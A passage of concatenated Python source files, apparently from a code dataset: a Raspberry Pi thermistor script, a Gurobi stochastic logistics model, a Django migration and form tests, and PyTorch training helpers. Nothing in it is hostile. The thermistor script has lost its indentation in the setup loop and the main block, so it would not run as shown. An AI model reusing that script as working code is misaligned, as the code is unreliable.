                for y_index, y in enumerate(range(*y_s)):
                    new_cells[(0, y_index)] = self.data[(index[0], y)]
                return new_cells
            else:
                # NOTE(review): message is misleading for non-tuple indices --
                # plain integer indices also land here.
                msg = '{cls.__name__} indices must be integers'
                raise TypeError(msg.format(cls=cls))
996,668 | 8f0584445aa53a4c546787efc74bbc34cc6090be | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# temp_LED.py
#
# Use a thermistor to read temperatures and illuminate
# a number of LEDs based upon the returned temperature
#
# Copyright 2015 Ken Powers
#
import time, math
import RPi.GPIO as GPIO
# Set GPIO pins to Broadcom numbering system
GPIO.setmode(GPIO.BCM)
# Define our constants
RUNNING = True
led_list = [17,27,22,10,9,11,13,26] # GPIO pins for LEDs
temp_low = 70 # Lowest temperature for LEDs (F)
temp_high = 86 # Highest temperature for LEDs (F)
a_pin = 23
b_pin = 24
# Set up our LED GPIO pins as outputs
for x in range(0,8):
GPIO.setup(led_list[x], GPIO.OUT)
GPIO.output(led_list[x], GPIO.LOW)
# Try to keep this value near 1 but adjust it until
# the temperature readings match a known thermometer
adjustment_value = 0.97
# Create a function to take an analog reading of the
# time taken to charge a capacitor after first discharging it
# Perform the procedure 100 times and take an average
# in order to minimize errors and then convert this
# reading to a resistance
def resistance_reading():
    """Estimate the thermistor resistance (ohms) by timing how long the RC
    pair takes to charge, averaged over many trials to reduce jitter.

    Bug fix: the original summed 99 trials (range(1, 100)) but divided by
    100, biasing every reading ~1% low; the average now uses the real trial
    count.  (Re-check adjustment_value calibration after this change.)
    """
    NUM_TRIALS = 100
    total = 0
    for _ in range(NUM_TRIALS):
        # Discharge the 330 nF capacitor through b_pin.
        GPIO.setup(a_pin, GPIO.IN)
        GPIO.setup(b_pin, GPIO.OUT)
        GPIO.output(b_pin, False)
        time.sleep(0.01)
        # Charge through the thermistor until b_pin reads HIGH (~1.65 V).
        GPIO.setup(b_pin, GPIO.IN)
        GPIO.setup(a_pin, GPIO.OUT)
        GPIO.output(a_pin, True)
        t1 = time.time()
        while not GPIO.input(b_pin):
            pass
        t2 = time.time()
        # Accumulate the charge time in microseconds.
        total = total + (t2 - t1) * 1000000
    # Average charge time -> resistance via the empirically fitted line.
    reading = total / NUM_TRIALS
    resistance = reading * 6.05 - 939
    return resistance
# Create a function to convert a resistance reading from our
# thermistor to a temperature in Celsius which we convert to
# Fahrenheit and return to our main loop
def temperature_reading(R):
    """Convert a thermistor resistance R (ohms) to temperature in CELSIUS
    using the beta-parameter (simplified Steinhart-Hart) equation."""
    B = 3977.0 # Thermistor constant from thermistor datasheet
    R0 = 10000.0 # Resistance of the thermistor being used
    t0 = 273.15 # 0 deg C in K
    t25 = t0 + 25.0 # 25 deg C in K
    # Steinhart-Hart equation
    inv_T = 1/t25 + 1/B * math.log(R/R0)
    T = (1/inv_T - t0) * adjustment_value
    # NOTE(review): returns Celsius -- the original "# Convert C to F"
    # comment was wrong; no Fahrenheit conversion happens here.
    return T
if __name__ == '__main__':
# Main loop
try:
while RUNNING:
# Get the thermistor temperature
t = temperature_reading(resistance_reading())
# Print temperature values in real time
print(t)
# Time interval for taking readings in seconds
time.sleep(0.1)
# If CTRL+C is pressed the main loop is broken
except KeyboardInterrupt:
RUNNING = False
# Actions under 'finally' will always be called
# regardless of what stopped the program
finally:
# Stop and cleanup to finish cleanly so the pins
# are available to be used again
GPIO.cleanup()
|
996,669 | 857af81c95856968d113793b56ad3686b8cc34f5 | import csv
import pandas as pd
import numpy as np
import ast
from itertools import product
from gurobipy import *
from network import Network
from od_demand_generator import demand_generator
from weightedzips import ZipCoords
from network import dist
from output import write_arcs_to_csv, write_zd_to_csv
datapath = "C:/Users/kbada/PycharmProjects/forged-by-machines/"
def create_stochastic_network():
    """Build the scenario-independent network skeleton.

    Loads nodes and zip codes from CSV, adds every origin->trans,
    trans->dest and origin->dest arc, creates one commodity per
    (origin, zip) pair (quantities are left to the scenarios), and
    enumerates all O-D and O-T-D paths per commodity.
    """
    # initialise a network
    network = Network()
    # Add nodes to network (lat/lon parsed from the 'location' tuple string)
    nodes = pd.read_csv(datapath + "Node location.csv", usecols=['node name', 'location'])
    for index, row in nodes.iterrows():
        name = row['node name']
        lat = ast.literal_eval(row['location'])[0]
        lon = ast.literal_eval(row['location'])[1]
        network.add_node(name, lat, lon)
    # Add arcs to network
    # Origin-Trans
    for node1 in network.get_origin_nodes():
        for node2 in network.get_trans_nodes():
            network.add_arc(node1, node2)
    # Trans-Destination
    for node1 in network.get_trans_nodes():
        for node2 in network.get_dest_nodes():
            network.add_arc(node1, node2)
    # Origin-Destination (direct shipping)
    for node1 in network.get_origin_nodes():
        for node2 in network.get_dest_nodes():
            network.add_arc(node1, node2)
    # Add commodities to network
    # Add zips to network: zip long and zip lat should be weighted and fixed: impossible to vary in each scenario as
    # we are simulating demand zip directly: hence no customer information in scenarios
    # Maybe we can evaluate zip location in each scenario and take average
    with open(datapath + "ZIP CODE.csv", newline='') as f:
        reader = csv.reader(f)
        zips = list(reader)
    zips = zips[0]
    zip_coords = ZipCoords()
    for zip_name in zips:
        # drop empty space: took 4 hours to find this bug
        zip_name = zip_name.replace(" ", "")
        network.add_zip(zip_name, zip_coords.get_lat(zip_name), zip_coords.get_lon(zip_name)) # temporarily using 0,0
    # add commodities: for stochastic - add all o-z pairs without setting quantity
    for origin_node in network.get_origin_nodes():
        for zip_name in network.get_zips():
            network.add_commodity(origin_node, zip_name)
    # create possible paths for each commodity
    for commodity in network.get_commodities():
        origin = commodity.origin_node
        # O-D paths (single direct arc)
        for dest in network.get_dest_nodes():
            arcs = []
            arcs.append(network.get_arc(origin.name + dest.name))
            network.add_path(arcs, commodity)
        # O-T-D paths (two arcs through a transshipment node)
        for trans in network.get_trans_nodes():
            for dest in network.get_dest_nodes():
                arcs = []
                arcs.append(network.get_arc(origin.name + trans.name))
                arcs.append(network.get_arc(trans.name + dest.name))
                network.add_path(arcs, commodity)
    return network
def warmstart_model(network, y, u):
    """Seed Gurobi variable start values from the deterministic mean-value
    solution saved to CSV.

    y: dict arc -> truck-count variable; u: dict (zip, dest-node) ->
    binary assignment variable.
    """
    # Import solution from mean-value deterministic model
    start_trucks = pd.read_csv(datapath + "warm-start-arc-trucks.csv")
    dest_assignment = pd.read_csv(datapath + "warm-start-o-z.csv")
    # Set y values using trucks dataframe (indexed by "origin->dest" labels)
    start_trucks.set_index(["Arc"], inplace=True)
    for a in network.get_arcs():
        y[a].start = start_trucks.loc[a.origin.name+"->" + a.dest.name, 'Number of Trucks']
    # Set u values using dest_assignment dataframe
    for index, row in dest_assignment.iterrows():
        z = str(row['ZIP'])
        d = row['Assigned Destination Node']
        u[network.get_zip(z), network.get_node(d)].start = 1
def multi_objective(objectives: list, ext_model):
    """
    Explore cost/distance/load trade-offs with an epsilon-constraint scheme.

    For each epsilon the model is optimized for distance while cost may
    deteriorate by at most (1 + epsilon) times the best cost found so far,
    then re-optimized for cost, then for load.  Note that the epsilon
    constraints are added cumulatively to ``ext_model`` and never removed,
    so constraints from earlier iterations stay active in later ones.

    :param objectives: list of gurobi linear expressions
        [obj_cost, obj_load, obj_distance] -- the order returned by
        create_extensive_form_model
    :param ext_model: gurobi model
    :return: None; prints a dict mapping epsilon -> objective values
    """
    # BUG FIX: the objectives list is ordered [cost, load, distance] (as the
    # docstring states and as create_extensive_form_model returns it), but
    # the previous code unpacked it as [cost, distance, load], silently
    # swapping the load and distance objectives.
    obj_cost, obj_load, obj_distance = objectives[0], objectives[1], objectives[2]
    ext_model.setParam("TimeLimit", 300)
    ext_model.setParam("MIPGap", 0.04)
    solution_values = {}
    epsilon_values = np.arange(start=0, stop=0.2, step=0.05)
    tolerance = 0.000001
    # Solve for cost without any additional constraint to anchor the blanket.
    ext_model.setObjective(obj_cost)
    ext_model.optimize()
    best_cost = ext_model.getObjective().getValue()
    # Generating Pareto solution "blanket" for cost as first objective
    for i in epsilon_values:
        solution_values[i] = {}
        # Optimize for distance allowing for some deterioration in cost
        ext_model.setObjective(obj_distance)
        cost_rhs = (1 + i) * best_cost + tolerance
        ext_model.addConstr(obj_cost <= cost_rhs)
        ext_model.optimize()
        best_dist = ext_model.getObjective().getValue()
        # Store distance obj. value for corresponding epsilon
        solution_values[i]['distance'] = best_dist
        # Get best corresponding cost (might be slightly different)
        ext_model.addConstr(obj_distance <= best_dist + tolerance)
        ext_model.setObjective(obj_cost)
        ext_model.optimize()
        best_cost = ext_model.getObjective().getValue()
        # Store cost obj. value for corresponding epsilon
        solution_values[i]['cost'] = best_cost
        # Optimize for load without allowing deterioration in cost
        cost_rhs = best_cost + tolerance
        ext_model.addConstr(obj_cost <= cost_rhs)
        ext_model.setObjective(obj_load)
        ext_model.optimize()
        # Store load obj. value for corresponding epsilon
        solution_values[i]['load'] = ext_model.getObjective().getValue()
    print(solution_values)
def create_extensive_form_model(network: Network, scenarios: list, demand_data):
    """
    Build the two-stage stochastic program in extensive form.

    :param scenarios: [1,2,....N]
    :param demand_data: dict with tuple keys of the form (scenario_num, commodity_name)
    :param network: Network object: consists of all commodities across all the scenarios
    :return: ([obj_cost, obj_load, obj_distance], gurobi Model) -- callers
        must unpack the objective list in this order
    """
    # create path variables for each commodity
    m = Model("extensive")
    # Decision variables-first stage begin
    # y[a]: integer number of trucks run on arc a (shared across scenarios)
    y = m.addVars(network.get_arcs(), vtype=GRB.INTEGER, lb=0, name='NumTrucks')
    # u[z, d]: 1 iff zip z is assigned to destination node d
    u = m.addVars(network.get_zips(), network.get_dest_nodes(), vtype=GRB.BINARY, lb=0, name='ZipDestinationMatch')
    tuplelist_comm_path_scenario = [(k, p, s) for k in network.get_commodities()
                                    for p in network.get_commodity_paths(k) for s in scenarios]
    # Decision variables-first stage end
    # Decision variables-second stage begin
    # x[k, p, s]: fraction of commodity k routed on path p in scenario s
    x = m.addVars(tuplelist_comm_path_scenario, vtype=GRB.CONTINUOUS, lb=0, ub=1,
                  name='CommodityPathScenario')
    # unfulfilled[k, s]: fraction of commodity k's demand left unserved in s
    unfulfilled = m.addVars(network.get_commodities(), scenarios, vtype=GRB.CONTINUOUS,
                            lb=0, ub=1, name='FractionUnfulfilledScenario')
    r = m.addVars(network.get_commodities(), scenarios, vtype=GRB.CONTINUOUS, lb=0, name='DistanceTraveledByCommodity')
    # max_load/min_load per scenario support the equity (load-spread) objective.
    max_load = m.addVars(scenarios, vtype=GRB.CONTINUOUS, lb=0, name='MaxLoad')
    min_load = m.addVars(scenarios, vtype=GRB.CONTINUOUS, lb=0, name='MinLoad')
    # Decision variables-second stage end
    m.update()
    m.modelSense = GRB.MINIMIZE
    #
    # first stage constraints--begin
    # every zip is assigned to exactly one destination node
    m.addConstrs(
        (u.sum(z, '*') == 1 for z in network.get_zips()), name='DestNodeSelection')
    # first stage constraints--end
    # second stage constraints--begin
    # r[k, s] lower-bounded by path distance plus last-mile (dest node -> zip)
    m.addConstrs(
        (r[k, s] >= p.distance * x[k, p, s] +
         dist(k.dest.lat, d.lat, k.dest.lon, d.lon) * u[k.dest, d]
         for k in network.get_commodities() for d in network.get_dest_nodes()
         for p in network.get_commodity_dest_node_paths(k, d) for s in scenarios),
        name='DistanceDestinationNodeToZip')
    # routed fraction plus unfulfilled fraction accounts for all demand
    m.addConstrs(
        (x.sum(k, '*', s) + unfulfilled[(k, s)] == 1 for k in network.get_commodities()
         for s in scenarios), name='CommodityFulfillment')
    # a path can only carry flow if all of its arcs have at least one truck
    m.addConstrs(
        (x[k, p, s] <= y[a] for s in scenarios for k in network.get_commodities()
         for p in network.get_commodity_paths(k) for a in p.arcs), name='PathOpen')
    # next constraint needs to be updated in each batch run: update just coefficients
    # (1000 is the assumed truck capacity per arc)
    m.addConstrs((quicksum(demand_data[(s, p.commodity)] * x[p.commodity, p, s]
                           for p in network.get_arc_paths(a)) <= 1000 * y[a] for a in network.get_arcs() for s in
                  scenarios), name='ArcCapacity')
    # m.addConstrs(
    #     (u[k.dest, d] >= sum(x[k, p, s] for p in network.get_commodity_dest_node_paths(k, d))
    #      for k in network.get_commodities() for d in network.get_dest_nodes() for s in scenarios
    #      ), name='PathOpenZipDestination')
    # m.addConstrs(
    #     (u[k.dest, d] >= x[k, p, s]for k in network.get_commodities() for d in network.get_dest_nodes()
    #      for p in network.get_commodity_dest_node_paths(k, d) for s in scenarios
    #      ), name='PathOpenZipDestination')
    # flow to a zip may only use paths ending at the zip's assigned dest node
    m.addConstrs(u[z, d] >= x[p.commodity, p, s] for z in network.get_zips() for d in network.get_dest_nodes()
                 for p in network.get_dest_node_zip_paths(d, z) for s in scenarios)
    # next two constraint needs to be updated in each batch run: update just coefficients
    m.addConstrs((min_load[s] <= sum(u[k.dest, d] * demand_data[s, k] for k in network.get_commodities())
                  for d in network.get_dest_nodes() for s in scenarios), name="MinLoad")
    m.addConstrs((max_load[s] >= sum(u[k.dest, d] * demand_data[s, k] for k in network.get_commodities())
                  for d in network.get_dest_nodes() for s in scenarios), name="MaxLoad")
    # second stage constraints--end
    # fixed + per-mile truck cost plus expected penalty for unfulfilled demand
    obj_cost = LinExpr(quicksum((100 + 2 * a.distance) * y[a] for a in network.get_arcs())) + (
        1 / len(scenarios)) * quicksum(
        1000 * demand_data[s, k] * unfulfilled[k, s] for k in network.get_commodities() for s in
        scenarios)
    # expected spread between most- and least-loaded destination node
    obj_load = (1 / len(scenarios)) * quicksum(max_load[s] - min_load[s] for s in scenarios)
    # expected total distance; 1/len(scenarios)*r is (1/N) * r by precedence
    obj_distance = quicksum((1 / len(scenarios)*r[k, s] for k in network.get_commodities() for s in scenarios))
    use_cost = False  # 11322, 12939
    use_load = False  # 100, 2000
    use_distance = False  # 570,690
    # if use_cost:
    #     m.setObjective(obj_cost)
    #     m.addConstr(obj_load<=2500)
    #     m.addConstr(obj_distance<=700)
    # elif use_load:
    #     m.setObjective(obj_load)
    #     m.addConstr(obj_cost<=2*11322)
    #     m.addConstr(obj_distance<=690)
    # elif use_distance:
    #     m.setObjective(obj_distance)
    #     m.addConstr(obj_cost<=1.2*12939) #2*11322
    #     m.addConstr(obj_load<=2000)
    # else:
    #     print("No objective specified")
    # m.setObjective(quicksum((100 + 2 * a.distance) * y[a] for a in network.get_arcs()) +
    #                (1 / len(scenarios)) * quicksum(
    #     1000 * demand_data[s, k] * unfulfilled[k, s] for k in network.get_commodities() for s in
    #     scenarios)
    #                + (1 / len(scenarios)) * quicksum(max_load[s] - min_load[s] for s in scenarios) +
    #                quicksum(r[z] for z in network.get_zips())
    #                )
    # m.setParam("TimeLimit", 400)
    # m.setParam("MIPGap", 0.04)
    # adding some heuristics constraint
    # a zip should be connected to one of the closes 3 dest nodes
    # for z in network.get_zips():
    #     close_dest_nodes = network.get_closest_dest_nodes(z,4)
    #     for d in network.get_dest_nodes():
    #         if d not in close_dest_nodes:
    #             m.addConstr(u[z,d]==0)
    m.update()
    # Warmstart model
    warmstart_model(network, y, u)
    """
    a=network.get_arcs()[0]
    s=1
    p=network.get_arc_paths(a)[0]
    m.chgCoeff(m.getConstrByName("ArcCapacity[{},{}]".format(a,s)), x[p.commodity, p, s], 60)
    Don't query again and again: query oonce and store the variables
    Modifying objective
    m.getVarByName("FractionUnfulfilledScenario[{},{}]".format(k,s)).setAttr("obj",1000*demand_data[s,k)
    """
    return [obj_cost, obj_load, obj_distance], m
def run_saa(network, batch_num, scen_num):
    """
    Sample Average Approximation (SAA) driver.

    Runs `batch_num` batches of `scen_num` sampled demand scenarios.  The
    extensive-form model is built once (first batch); later batches only
    patch the demand-dependent coefficients in place, which is much cheaper
    than rebuilding the model.

    :param network: Network with commodities/paths already created
    :param batch_num: number of SAA batches (independent demand samples)
    :param scen_num: number of scenarios per batch
    """
    scenario_list = [i for i in range(scen_num)]
    # declare dictionaries for storing necessary objects to update model
    unfulfilled_vars = {}
    x_vars = {}
    u_vars = {}
    # NOTE(review): y_vars is populated below but never read in this
    # function -- presumably kept for solution extraction; confirm intent.
    y_vars={}
    arc_capacity_constraints = {}
    min_load_con = {}
    max_load_con = {}
    for i in range(batch_num):
        # generate demand data
        demand_data = {}
        for k in network.get_commodities():
            for s in scenario_list:
                # demand_generator is defined elsewhere; sampled demand is
                # truncated at zero
                temp_demand = max(int(demand_generator(k.origin_node.name, int(k.dest.name))), 0)
                demand_data[(s, k)] = temp_demand
        # build or update model
        if i == 0:
            # build model from scratch
            objectives, ext_model = create_extensive_form_model(network, scenario_list, demand_data)
            # get necessary variables and constraints which need to be updated
            # (looked up once by Gurobi name and cached for later batches)
            for s in scenario_list:
                for k in network.get_commodities():
                    unfulfilled_vars[(k, s)] = ext_model.getVarByName("FractionUnfulfilledScenario[{},{}]".format(k, s))
                for a in network.get_arcs():
                    arc_capacity_constraints[(a, s)] = ext_model.getConstrByName("ArcCapacity[{},{}]".format(a, s))
                for k in network.get_commodities():
                    for p in network.get_commodity_paths(k):
                        x_vars[(k, p, s)] = ext_model.getVarByName("CommodityPathScenario[{},{},{}]".format(k, p, s))
                for d in network.get_dest_nodes():
                    min_load_con[d, s] = ext_model.getConstrByName("MinLoad[{},{}]".format(d, s))
                    max_load_con[d, s] = ext_model.getConstrByName("MaxLoad[{},{}]".format(d, s))
            for zip_name in network.get_zips():
                for destination_node in network.get_dest_nodes():
                    u_vars[(zip_name, destination_node)] = ext_model.getVarByName("ZipDestinationMatch[{},{}]".format(
                        zip_name, destination_node))
            for arc in network.get_arcs():
                y_vars[arc] = ext_model.getVarByName("NumTrucks[{}]".format(arc))
            # use multi objective stuff
            multi_objective(objectives, ext_model)
        else:
            # change coefficients of model with the new demand data
            # update arc capacity constraint
            for a in network.get_arcs():
                for p in network.get_arc_paths(a):
                    for s in scenario_list:
                        ext_model.chgCoeff(arc_capacity_constraints[a, s], x_vars[p.commodity, p, s],
                                           demand_data[s, p.commodity])
            # update load constraints
            for s in scenario_list:
                for d in network.get_dest_nodes():
                    for k in network.get_commodities():
                        ext_model.chgCoeff(min_load_con[d, s], u_vars[k.dest, d], -demand_data[s, k])  # coeff are neg
                        ext_model.chgCoeff(max_load_con[d, s], u_vars[k.dest, d], -demand_data[s, k])
            # update objective
            for k in network.get_commodities():
                for s in scenario_list:
                    unfulfilled_vars[k, s].setAttr("obj", 1000 * demand_data[s, k])  # Change in linear expression
            ext_model.update()
            # NOTE(review): batches after the first patch coefficients but
            # never re-optimize (multi_objective is only called when i == 0)
            # -- confirm whether a solve is intended here.
# Guard the script entry point so importing this module for its
# model-building helpers does not trigger a (potentially hours-long)
# network build and solver run as an import side effect.
if __name__ == "__main__":
    network = create_stochastic_network()
    run_saa(network, 1, 1)
|
996,670 | 3cc6fd8efb4774186682e7cc75418d595b7d696f | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Create the ``Roles`` model: one role choice record per user."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('jobpost', '0002_auto_20150825_0115'),
    ]

    operations = [
        migrations.CreateModel(
            name='Roles',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                # 2-letter role code restricted to the four choices below
                ('roles', models.CharField(max_length=3, choices=[(b'RO', b'Rogue'), (b'WA', b'Warrior'), (b'WI', b'Wizard'), (b'AR', b'Archer')])),
                # exactly one Roles row per user
                ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
996,671 | 3469776d21a1e64aec486755074d6426f76f4102 | leafGIF="""""" |
996,672 | fcf74e0f7b8ad56e01c934dfcefef7ca618ee41a | """Tests for group forms."""
# pylint: disable=invalid-name
from datetime import datetime
from unittest import TestCase
from taggit.models import Tag
from mock import patch, call
from model_mommy import mommy
from open_connect.connectmessages.tests import ConnectMessageTestCase
from open_connect.groups import forms
from open_connect.groups.models import Group, GroupRequest
from open_connect.connect_core.tests.test_utils_mixins import TEST_HTML
class GroupRequestFormTest(ConnectMessageTestCase):
    """Tests for GroupRequestForm."""
    @patch('open_connect.groups.tasks.send_system_message')
    def test_save_approve(self, mock):
        """Test that save does the right thing if approving."""
        # `group__name` presumably names the related auth group the user
        # joins on approval (checked via user2.groups below).
        group = mommy.make('groups.Group', group__name='Cool Group')
        group_request = GroupRequest.objects.create(
            user=self.user2, group=group)
        form = forms.GroupRequestForm({
            'open_requests': [group_request.pk],
            'action': 'approve'
        })
        self.assertTrue(form.is_valid())
        form.save(user=self.user1)
        # re-fetch to pick up moderation fields written by save()
        group_request = GroupRequest.objects.get(pk=group_request.pk)
        self.assertEqual(group_request.moderated_by, self.user1)
        self.assertIsInstance(group_request.moderated_at, datetime)
        self.assertTrue(group_request.approved)
        self.assertIn(group.group, self.user2.groups.all())
        # approval should enqueue a system message to the requester
        self.assertTrue(mock.delay.called)
        message_args = mock.delay.call_args[0]
        self.assertEqual(message_args[0], self.user2.pk)
        self.assertEqual(message_args[1], u"You've been added to Cool Group")
        self.assertIn(group.full_url, message_args[2])

    def test_save_reject(self):
        """Test that save does the right thing if rejecting."""
        group_request = GroupRequest.objects.create(
            user=self.user2, group=self.group)
        form = forms.GroupRequestForm({
            'open_requests': [group_request.pk],
            'action': 'reject'
        })
        self.assertTrue(form.is_valid())
        form.save(user=self.user1)
        group_request = GroupRequest.objects.get(pk=group_request.pk)
        self.assertEqual(group_request.moderated_by, self.user1)
        self.assertIsInstance(group_request.moderated_at, datetime)
        self.assertFalse(group_request.approved)
        self.assertNotIn(self.group.group, self.user2.groups.all())
class GroupFormTest(ConnectMessageTestCase):
    """Tests for GroupForm."""
    def setUp(self):
        """Setup the GroupFormTest"""
        self.category = mommy.make('groups.Category')

    def test_clean_tags_with_valid_tags(self):
        """Form should validate if submitted with valid tags."""
        Tag.objects.create(name='these')
        Tag.objects.create(name='are')
        Tag.objects.create(name='valid')
        Tag.objects.create(name='tags')
        form = forms.GroupForm(
            {
                'tags': 'these,are, valid, tags',
                'category': self.category.pk
            })
        self.assertTrue(form.is_valid())

    def test_clean_tags_with_invalid_tags(self):
        """Form should have errors if submitted with invalid tags."""
        form = forms.GroupForm(
            {
                'tags': 'this,is,an,invalid,tag,list',
                'category': self.category.pk
            })
        self.assertFalse(form.is_valid())
        self.assertEqual(
            form.errors['tags'],
            [u'These tags are invalid: an, invalid, is, list, tag, this.']
        )

    @patch('open_connect.groups.forms.add_user_to_group')
    def test_owners_added_to_group(self, mock):
        """Test that owners are added to the group"""
        form = forms.GroupForm(
            {
                'owners': [self.user1.pk, self.user2.pk],
                'category': self.category.pk
            },
            instance=self.group1
        )
        self.assertTrue(form.is_valid())
        form.save()
        # one async add_user_to_group call per owner
        self.assertEqual(mock.delay.call_count, 2)
        call_list = mock.delay.call_args_list
        self.assertItemsEqual(
            call_list,
            [call(self.user1.pk, self.group1.pk),
             call(self.user2.pk, self.group1.pk)]
        )

    @patch.object(forms.SanitizeHTMLMixin, 'sanitize_html')
    def test_clean_description(self, mock):
        """Test the clean_description cleaner"""
        # pylint: disable=no-self-use
        group = mommy.make(Group)
        form = forms.GroupForm(
            {
                'description': TEST_HTML,
                'category': self.category.pk
            },
            instance=group
        )
        form.is_valid()
        # BUG FIX: `assertCalledWith` is not a Mock method -- accessing it
        # merely auto-creates a child mock, so the original "assertion"
        # never checked anything.  `assert_called_with` is the real API and
        # actually verifies sanitize_html received the submitted HTML.
        mock.assert_called_with(TEST_HTML)
class GroupInviteFormTest(TestCase):
    """Tests for GroupInviteForm"""
    def test_invalid_emails_cause_error(self):
        """An invalid email address makes the form invalid with an error."""
        invite_form = forms.GroupInviteForm({'emails': 'abcd123123'})
        self.assertFalse(invite_form.is_valid())
        self.assertEqual(
            invite_form.errors['emails'], [u'No Valid Addresses Found'])

    def test_valid_address_go_through(self):
        """A single valid email address validates."""
        invite_form = forms.GroupInviteForm({'emails': 'me@razzmatazz.local'})
        self.assertTrue(invite_form.is_valid())

    def test_multiple_addresses(self):
        """A comma-separated list of addresses (incl. named form) validates."""
        # pylint: disable=line-too-long
        address_string = 'me@razzmatazz.local, m@razzmatazz.local, Adam <adam@gmail.com>'
        invite_form = forms.GroupInviteForm({'emails': address_string})
        self.assertTrue(invite_form.is_valid())
class GroupDeleteFormTest(TestCase):
    """Tests for GroupDeleteForm."""
    def test_yes(self):
        """Answering 'yes' soft-deletes the group."""
        target_group = Group.objects.create(name='yes')
        delete_form = forms.GroupDeleteForm({'are_you_sure': 'yes'})
        delete_form.group = target_group
        self.assertTrue(delete_form.is_valid())
        delete_form.save()
        # soft-deleted rows are only visible through with_deleted()
        refreshed = Group.objects.with_deleted().get(pk=target_group.pk)
        self.assertEqual(refreshed.status, 'deleted')

    def test_no(self):
        """Answering 'no' leaves the group active."""
        target_group = Group.objects.create(name='no')
        delete_form = forms.GroupDeleteForm({'are_you_sure': 'no'})
        delete_form.group = target_group
        self.assertTrue(delete_form.is_valid())
        delete_form.save()
        refreshed = Group.objects.get(pk=target_group.pk)
        self.assertEqual(refreshed.status, 'active')
|
996,673 | d8517c7e95e2211d3dd4eba22f5a477f177fdab0 | import glob
import os
import random
import time
import numpy as np
from PIL import Image
import scipy.spatial.distance
from sklearn import preprocessing
import torch
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from torchvision import datasets, transforms
from tqdm.notebook import tqdm
"""
Utility methods and classes for PyTorch training and inference for writer recognition tasks.
"""
def set_all_seeds(seed):
    """
    Make runs reproducible by resetting every relevant RNG with `seed` and
    forcing deterministic cuDNN behaviour.

    Reference:
        [1] https://pytorch.org/docs/stable/notes/randomness.html, Accessed: 2021-07-19

    Args:
        seed: The desired seed to be set
    """
    os.environ['PYTHONHASHSEED'] = str(seed)
    # Seed the three RNG sources in the same order as before: stdlib,
    # then torch, then numpy.
    for seed_fn in (random.seed, torch.manual_seed, np.random.seed):
        seed_fn(seed)
    # Trade speed for determinism in cuDNN convolution algorithm selection.
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
def seed_worker(worker_id):
    """
    Ensures reproducibility for `DataLoader` classes.

    Meant to be passed as the `worker_init_fn` argument of a PyTorch
    `DataLoader`: each worker derives its RNG state from torch's
    per-worker initial seed.

    Reference:
        [1] https://pytorch.org/docs/stable/notes/randomness.html#dataloader, Accessed: 2021-07-19

    Args:
        worker_id : Argument is handled by the respective `DataLoader`
    """
    derived_seed = torch.initial_seed() % 2 ** 32
    # Propagate torch's worker seed to numpy and the stdlib RNG.
    np.random.seed(derived_seed)
    random.seed(derived_seed)
class Trainer:
    """Class for training a model.
    This class supports also logging with `TensorBoard`"""

    def __init__(self, model, criterion, optimizer, scheduler, num_epochs, train_set_loader, val_set_loader,
                 experiment_name=None, hyper_params=None, num_epochs_early_stop=10, log_dir=None,
                 saved_models_dir=None):
        """
        Args:
            model: Model to be trained
            criterion: Desired criterion
            optimizer: Desired optimizer
            scheduler: Learning rate scheduler. Set this argument to `None`,
                if you do not want to use an LR scheduler
            num_epochs: Maximum number of epochs the model should be trained for
            train_set_loader: `DataLoader` instance of the training set
            val_set_loader: `DataLoader` instance of the validation set
            experiment_name (optional): Name of the experiment (has to be a valid name for
                a directory). If set to `None`, the experiment will be named 'experiment_<unix time stamp>'
            hyper_params (optional): Dictionary containing the hyper parameters of the trained model to be
                logged to `TensorBoard`
            num_epochs_early_stop (optional): Number of epochs after the training should be stopped,
                if the validation loss does not improve any more
            log_dir (optional): Path to the root directory, where the `TensorBoard` data should be logged to.
                If set to `None`, no logging takes place.
            saved_models_dir (optional): Path to the root directory, where the models should be saved to.
                A model is saved after each epoch, where the validation loss improved compared to the best so far
                obtained validation loss. If set to `None`, no models are saved.
        """
        self.model = model
        self.criterion = criterion
        self.optimizer = optimizer
        self.scheduler = scheduler
        self.num_epochs = num_epochs
        self.train_set_loader = train_set_loader
        self.val_set_loader = val_set_loader
        self.hyper_params = hyper_params
        self.num_epochs_early_stop = num_epochs_early_stop
        if experiment_name:
            self.experiment_name = experiment_name
        else:
            # fall back to a millisecond-timestamp-based unique name
            self.experiment_name = "experiment_" + str(int(time.time() * 1000.0))
        self.log_path = None
        self.summary_writer = None
        if log_dir:
            self.log_path = os.path.join(log_dir, self.experiment_name)
            # ensures, that no previous experiment with the same name was already conducted in `log_dir`
            os.makedirs(self.log_path)
            self.summary_writer = SummaryWriter(self.log_path)
        self.saved_models_path = None
        if saved_models_dir:
            self.saved_models_path = os.path.join(saved_models_dir, self.experiment_name)
            os.makedirs(self.saved_models_path)
        self.device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")

    def __call__(self, *args, **kwargs):
        """Starts the training"""
        # NOTE(review): epoch accuracies produced by _train/_validate are
        # 0-dim torch tensors (from .float().mean()), not Python floats.
        epoch_train_acc, epoch_val_acc, epoch_train_loss, epoch_val_loss = 0., 0., 0., 0.
        best_train_acc, best_val_acc, best_train_loss, best_val_loss = 0., 0., float('inf'), float('inf')
        early_stop_count = 0
        early_stop = False
        epoch = 0
        for epoch in range(self.num_epochs):
            print(f"Epoch {epoch + 1}/{self.num_epochs}")
            if self.train_set_loader:
                epoch_train_acc, epoch_train_loss = self._train(epoch)
            if self.val_set_loader:
                epoch_val_acc, epoch_val_loss = self._validate()
            # logging
            if self.summary_writer:
                self.summary_writer.add_scalars("accuracy", {
                    "training": epoch_train_acc,
                    "validation": epoch_val_acc,
                }, epoch + 1)
                self.summary_writer.add_scalars("loss", {
                    "training": epoch_train_loss,
                    "validation": epoch_val_loss,
                }, epoch + 1)
                self.summary_writer.flush()
            # checkpoint whenever validation loss improves on the best seen
            # so far (checked before the bests are refreshed below)
            if epoch_val_loss < best_val_loss:
                early_stop_count = 0
                if self.saved_models_path:
                    torch.save(self.model.state_dict(),
                               os.path.join(self.saved_models_path, f"epoch_{epoch + 1}.pth"))
